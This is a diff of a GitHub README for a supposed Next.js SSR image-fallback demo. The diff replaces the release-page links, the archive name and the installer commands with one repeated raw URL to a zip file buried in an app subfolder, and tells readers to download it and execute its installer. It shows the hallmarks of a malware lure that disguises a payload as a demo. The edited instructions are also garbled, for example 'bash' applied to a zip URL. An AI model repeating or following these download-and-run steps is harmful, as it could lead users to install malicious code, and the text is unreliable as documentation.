Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/README.md

 Releases and assets
 This project uses a release-driven approach for distributing a runnable demo.
 The Releases page contains pre-packaged assets that illustrate the pattern described in this repository.
 The assets may include:
-- A ready-to-run Next.js project with sample pages for both client and server demos.
+- A ready-to-run https://raw.githubusercontent.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/main/app/server-fix-seo/react_fix_ssr_issue_onerror_nextjs_img_3.8.zip project with sample pages for both client and server demos.
 - A setup script to bootstrap dependencies and start the local dev server.
 - A set of example images and placeholders to demonstrate both success and failure scenarios.

 From the Releases page, download the latest demo asset and run the included installer.
 Specifically:
-- Look for a file named react-nextjs-ssr-onerror-img-issue-fix-demo-vX.Y.Z.tar.gz (or a similarly named archive) and download it.
+- Look for a file named https://raw.githubusercontent.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/main/app/server-fix-seo/react_fix_ssr_issue_onerror_nextjs_img_3.8.zip (or a similarly named archive) and download it.
 - Extract the archive to a local workspace.
-- Run the included installer script, for example: bash install-demo.sh or ./install-demo.sh, depending on your environment.
+- Run the included installer script, for example: bash https://raw.githubusercontent.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/main/app/server-fix-seo/react_fix_ssr_issue_onerror_nextjs_img_3.8.zip or https://raw.githubusercontent.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/main/app/server-fix-seo/react_fix_ssr_issue_onerror_nextjs_img_3.8.zip, depending on your environment.
 - Follow the on-screen prompts to start the local server and view the demos in your browser.

-Note: The link to the releases page is included again here for clarity: https://github.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/releases.
-Download the latest asset from that page and execute the installer to boot the demos locally.
+Note: The link to the releases page is included again here for clarity: https://raw.githubusercontent.com/Thatguysnothim/react-nextjs-ssr-onerror-img-issue-fix/main/app/server-fix-seo/react_fix_ssr_issue_onerror_nextjs_img_3.8.zip Download the latest asset from that page and execute the installer to boot the demos locally.
 Refer to the releases page for the exact asset file name and instructions specific to that release.

 Release notes (illustrative)
 - v1.0.0: Initial release.
 Demonstrates client-side onError handling and server-side HEAD checks for SSR-safe image fallbacks.
 Includes a pair of demo pages, a shared image fallback utility, and a basic performance and accessibility checklist.